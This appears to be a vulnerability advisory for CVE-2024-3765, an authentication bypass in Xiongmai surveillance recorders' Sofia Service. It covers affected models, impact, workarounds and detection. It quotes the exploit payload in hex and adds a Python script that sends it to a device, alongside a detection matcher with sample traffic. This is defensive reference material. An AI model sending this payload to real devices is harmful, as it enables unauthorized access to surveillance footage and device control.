CVE-2024-3765
📋 TL;DR
This critical vulnerability in Xiongmai video surveillance devices allows remote attackers to bypass access controls by sending a crafted input (the hex payload quoted under "How to Verify" below) to the Sofia Service component. Attackers can reach device functions without credentials. All listed Xiongmai models that run the vulnerable Sofia Service are affected.
💻 Affected Systems
- Xiongmai AHB7804R-MH-V2
- AHB8004T-GL
- AHB8008T-GL
- AHB7004T-GS-V3
- AHB7004T-MHV2
- AHB8032F-LME
- XM530_R80X30-PQ_8M
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Check the vendor for newer firmware, noting that no fix was known at the time of writing
⚠️ Risk & Real-World Impact
Worst Case
Complete device compromise allowing attackers to disable security systems, manipulate video feeds, access sensitive footage, or use devices as network footholds for lateral movement.
Likely Case
Unauthorized access to surveillance systems enabling privacy violations, footage theft, or disruption of security monitoring.
If Mitigated
Little residual risk if devices are segmented behind firewalls with strict network access controls; an attacker who already has a foothold on the management network can still exploit the device.
🎯 Exploit Status
Public proof-of-concept script available on GitHub (pocCheck3-en.py in the netsecfish repository). Exploitation requires only sending the crafted input to the vulnerable service; no credentials are needed.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: None available
Restart Required: No
Instructions:
No official patch available. Consider replacing affected devices with products from responsive vendors.
🔧 Temporary Workarounds
Network Segmentation
Isolate affected devices from the internet and restrict network access to trusted management systems only.
Use firewall rules to block all inbound traffic to affected devices except from authorized management IPs
Service Disablement
Disable the vulnerable Sofia Service if it is not required for device functionality. On Xiongmai firmware Sofia is the device's main management process, so it can rarely be stopped without losing the device's functions; in practice this means blocking its TCP port at the network edge rather than disabling the service.
Check device documentation for service management commands
🧯 If You Can't Patch
- Segment devices on isolated VLAN with strict firewall rules blocking all unnecessary traffic
- Monitor network traffic to/from affected devices for exploitation attempts
🔍 How to Verify
Check if Vulnerable:
Test with the public PoC script (pocCheck3-en.py) or send the crafted input 'ff00000000000000000000000000f103250000007b202252657422203a203130302c202253657373696f6e494422203a202230783022207d0a' as raw bytes to the device's Sofia Service TCP port. The hex decodes to a 20-byte binary frame header followed by the ASCII body '{ "Ret" : 100, "SessionID" : "0x0" }'. Only test devices you are authorized to test.
Check Version:
Check device web interface or console for firmware version information
Verify Fix Applied:
No official fix available to verify. Verify workarounds by testing that exploitation attempts fail.
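As an added example (not the page's own material and not the netsecfish PoC), the following Python decodes the published hex input into its header fields and JSON body and can send it to a device as a check. The 20-byte header layout (magic 0xFF, version, session id, sequence number, packet counters, message id, body length; little-endian) and the default TCP port 34567 are assumptions taken from public DVRIP/Sofia protocol descriptions, not from this page.

```python
"""Check helper for CVE-2024-3765.

Added example: not the page's own text and not the netsecfish PoC. It decodes
the payload published with the CVE and can send it to a device you are
authorized to test.
"""
import json
import socket
import struct
import sys
from typing import Optional

# Hex input published with the CVE (the payload quoted on this page).
POC_HEX = (
    "ff00000000000000000000000000f103250000007b202252657422203a203130302c"
    "202253657373696f6e494422203a202230783022207d0a"
)

# Assumed frame layout (from public DVRIP/Sofia write-ups, not from the page):
# magic 0xFF, version, 2 reserved bytes, session id, sequence number,
# total packets, current packet, message id, body length; little-endian.
HEADER_FMT = "<BBxxIIBBHI"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 20 bytes
DEFAULT_PORT = 34567  # assumed default Sofia Service TCP port


def parse_frame(raw: bytes) -> dict:
    """Split a Sofia frame into header fields and its body (JSON-decoded when possible)."""
    if len(raw) < HEADER_LEN or raw[0] != 0xFF:
        raise ValueError("not a Sofia frame")
    _magic, version, session, seq, _total, _cur, msgid, length = struct.unpack(
        HEADER_FMT, raw[:HEADER_LEN]
    )
    body = raw[HEADER_LEN:HEADER_LEN + length]
    if len(body) != length:
        raise ValueError(f"body truncated: have {len(body)} of {length} bytes")
    try:
        decoded = json.loads(body.decode("ascii", "replace").rstrip("\x00\n"))
    except ValueError:
        decoded = None
    return {"version": version, "session": session, "seq": seq, "msgid": msgid,
            "length": length, "body": decoded, "raw_body": body}


def build_probe() -> bytes:
    """The PoC input as raw bytes, exactly as published."""
    return bytes.fromhex(POC_HEX)


def _recv_exact(sock: socket.socket, n: int) -> Optional[bytes]:
    """Read exactly n bytes, or None if the peer closes first."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            return None
        buf += chunk
    return buf


def send_probe(host: str, port: int = DEFAULT_PORT, timeout: float = 5.0) -> Optional[dict]:
    """Send the PoC frame and return the parsed reply, or None if the device
    closes the connection or stays silent. Use only against devices you are
    authorized to test."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_probe())
            head = _recv_exact(sock, HEADER_LEN)
            if head is None:
                return None
            length = struct.unpack(HEADER_FMT, head)[-1]
            body = _recv_exact(sock, length) if length else b""
            if body is None:
                return None
            return parse_frame(head + body)
    except OSError:
        return None


if __name__ == "__main__":
    if len(sys.argv) < 2:
        frame = parse_frame(build_probe())
        print("probe decodes to msgid", frame["msgid"], "session", frame["session"],
              "body", frame["body"])
    else:
        target_port = int(sys.argv[2]) if len(sys.argv) > 2 else DEFAULT_PORT
        reply = send_probe(sys.argv[1], target_port)
        print("no reply" if reply is None else reply)
```

Run it without arguments to see the decode (message id 1009, session id 0, a 37-byte body `{ "Ret" : 100, "SessionID" : "0x0" }`); run it with a host and optional port against a device you are authorized to test. The page does not state which reply distinguishes a vulnerable device, so the function only returns the parsed reply for you to compare with the PoC script's logic and with a device known to be unaffected: the defect the CVE describes is the device acting on, or answering, a frame that carries no authenticated session.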
📡 Detection & Monitoring
Log Indicators:
- Device actions or sessions recorded without a preceding successful login (device logs on these models are sparse, so treat network capture as the primary source)
- Sofia Service connections from hosts that are not authorized management systems
Network Indicators:
- Traffic containing the specific exploit payload to device Sofia Service ports
- Unauthorized access to device management interfaces
SIEM Query:
Search for TCP traffic to the device's Sofia Service port (34567 by default on Xiongmai firmware) or other device management ports whose payload contains 'ff00000000000000000000000000f103250000007b202252657422203a203130302c202253657373696f6e494422203a202230783022207d0a'. The payload is a binary Sofia frame, not HTTP, so searching only ports 80/443 will miss it.
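Added example for the network indicators and SIEM query above (not from the page or the netsecfish repository): a small matcher that flags captured TCP payloads carrying the PoC body, plus a looser heuristic for Sofia frames sent to the Sofia port with a null session id. The port (34567), the header layout and the message ids used in the samples are assumptions from public DVRIP descriptions; the traffic records are constructed for the example, not real captures.

```python
"""Detection matcher for CVE-2024-3765 traffic.

Added example: not the page's own text and not the netsecfish PoC.
"""
import struct
from typing import Iterable, List, Optional, Tuple

# Hex input published with the CVE (the payload quoted on this page).
POC_HEX = (
    "ff00000000000000000000000000f103250000007b202252657422203a203130302c"
    "202253657373696f6e494422203a202230783022207d0a"
)
POC_BYTES = bytes.fromhex(POC_HEX)
HEADER_FMT = "<BBxxIIBBHI"      # assumed 20-byte DVRIP/Sofia header layout
HEADER_LEN = struct.calcsize(HEADER_FMT)
POC_BODY = POC_BYTES[HEADER_LEN:]  # JSON body alone; header session/sequence may vary
SOFIA_PORTS = {34567}            # assumed default Sofia TCP port; add remapped ports
LOGIN_REQ2 = 1000                # assumed DVRIP login request id (the only frame
                                 # legitimately sent before a session exists)

# (src ip, dst ip, dst port, tcp payload); constructed for the example.
Record = Tuple[str, str, int, bytes]


def classify(dst_port: int, payload: bytes) -> Optional[str]:
    """Return an alert name for one TCP payload, or None if nothing matches."""
    # Exact indicator from the advisory: the PoC body anywhere in the stream.
    if POC_BODY in payload:
        return "CVE-2024-3765 PoC payload"
    # Heuristic (assumption, tune per site): a non-login Sofia frame that carries
    # no session id has skipped authentication.
    if dst_port in SOFIA_PORTS and len(payload) >= HEADER_LEN and payload[0] == 0xFF:
        _, _, session, _, _, _, msgid, _ = struct.unpack(HEADER_FMT, payload[:HEADER_LEN])
        if session == 0 and msgid != LOGIN_REQ2:
            return f"Sofia frame msgid {msgid} sent with null session"
    return None


def scan(records: Iterable[Record]) -> List[Tuple[str, str, str]]:
    """Run classify() over captured records and return (src, dst, alert) hits."""
    alerts = []
    for src, dst, port, payload in records:
        hit = classify(port, payload)
        if hit:
            alerts.append((src, dst, hit))
    return alerts


def sofia_frame(msgid: int, session: int, body: bytes) -> bytes:
    """Build a sample Sofia frame under the assumed header layout (for test data)."""
    return struct.pack(HEADER_FMT, 0xFF, 0, session, 0, 0, 0, msgid, len(body)) + body


# Constructed sample traffic: one PoC hit, benign login and keepalive frames,
# an HTTP request, and a non-login frame with a null session.
SAMPLE_RECORDS: List[Record] = [
    ("10.0.0.5", "10.0.1.20", 34567, POC_BYTES),
    ("10.0.0.9", "10.0.1.20", 34567, sofia_frame(LOGIN_REQ2, 0, b'{"UserName":"admin"}')),
    ("10.0.0.9", "10.0.1.20", 34567, sofia_frame(1006, 0x12345678, b"")),  # assumed keepalive id
    ("10.0.0.7", "10.0.1.20", 80, b"GET / HTTP/1.1\r\nHost: 10.0.1.20\r\n\r\n"),
    ("10.0.0.5", "10.0.1.20", 34567, sofia_frame(1020, 0, b"{}")),
]

if __name__ == "__main__":
    for src, dst, alert in scan(SAMPLE_RECORDS):
        print(f"{src} -> {dst}: {alert}")
```

Matching on the body rather than the full 57-byte frame catches replays where the attacker changes the header's session or sequence fields; the null-session heuristic is broader still and is the part to validate against your own baseline traffic before alerting on it.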
🔗 References
- https://github.com/netsecfish/xiongmai_incorrect_access_control
- https://github.com/netsecfish/xiongmai_incorrect_access_control/blob/main/pocCheck3-en.py
- https://vuldb.com/?ctiid.260605
- https://vuldb.com/?id.260605
- https://vuldb.com/?submit.311903